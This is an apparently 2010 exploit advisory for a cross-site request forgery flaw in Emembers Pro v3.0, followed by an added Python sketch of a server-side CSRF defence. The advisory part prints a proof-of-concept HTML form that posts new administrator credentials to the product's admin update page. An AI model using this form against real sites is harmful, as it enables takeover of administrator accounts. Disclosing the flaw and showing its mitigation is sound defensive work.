~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Emembers Pro
|~Price : N/A
|~Version : v.3.0
|~Vulnerability Style : Cross Site Request Forgery
|~Vulnerability Dir : /admin
|~Google Keyword : N/A
|[~]Date : "07.12.2010"
|[~]Tested on : (L):Vista (R):Demo
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Cross Site Request Forgery POC EXPLOIT~~~~~~~~~~~}|
<form method=post action="http://$TARGET/$DIR/admin/update.asp?mode=admin">
<TD class=Font1>Username<font color="#FF0000" face="Verdana">*</font></TD>
<TD>
<INPUT class=field size=15 name=username value="admin"></TD>
<TD align=left width="6%">
&nbsp;</TD>
</tr>
<tr>
<TD class=Font1>Password<font color="#FF0000" face="Verdana">*</font></TD>
<TD>
<INPUT type=password class=field size=15 name=pw ></TD>
<TD align=left width="6%">
&nbsp;</TD>
</tr>
<tr>
<TD class=Font1>Confirm Password<font color="#FF0000" face="Verdana">*</font></TD>
<TD>
<INPUT type=password class=field size=15 name=pw2 ></TD>
<TD align=left width="6%">
&nbsp;</TD>
</tr>
<TR >
<TD vAlign=top align=middle class=text>
<INPUT type=image src=images/update.gif name=submit0></TD></TR>
<TR class=tblBG>
<TD width="45%">
</TD></TR>
=============================================================
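[~] Added example (not part of the original advisory and not Emembers Pro code): the form above submits only username, pw and pw2, with no per-session secret, so the server cannot tell a request made from the admin panel from one made by another site. A server-side gate for that update request, sketched in Python; SERVER_KEY, TRUSTED_ORIGIN, the csrf_token field name and all function names are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical server-side secret; generated at start-up for this demo only.
SERVER_KEY = secrets.token_bytes(32)
# Constructed value: the origin the admin panel is really served from.
TRUSTED_ORIGIN = "https://members.example"


def issue_token(session_id: str) -> str:
    """Token embedded as a hidden field when the admin form is rendered."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"


def token_ok(session_id: str, token: str) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, sent_mac = (token or "").partition(".")
    if not sep or not nonce or not sent_mac:
        return False
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return hmac.compare_digest(mac.hexdigest().encode(), sent_mac.encode())


def same_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or Referer) is the admin site."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_admin_update(session_id: str, headers: dict, form: dict) -> tuple:
    """Gate for the credential-update POST; returns (allowed, reason)."""
    if not same_origin(headers):
        return False, "cross-origin request"
    if not token_ok(session_id, form.get("csrf_token", "")):
        return False, "missing or invalid CSRF token"
    if not form.get("pw") or form.get("pw") != form.get("pw2"):
        return False, "password confirmation mismatch"
    return True, "ok"
```

The token is bound to the session id, so a token issued to one session is rejected for any other.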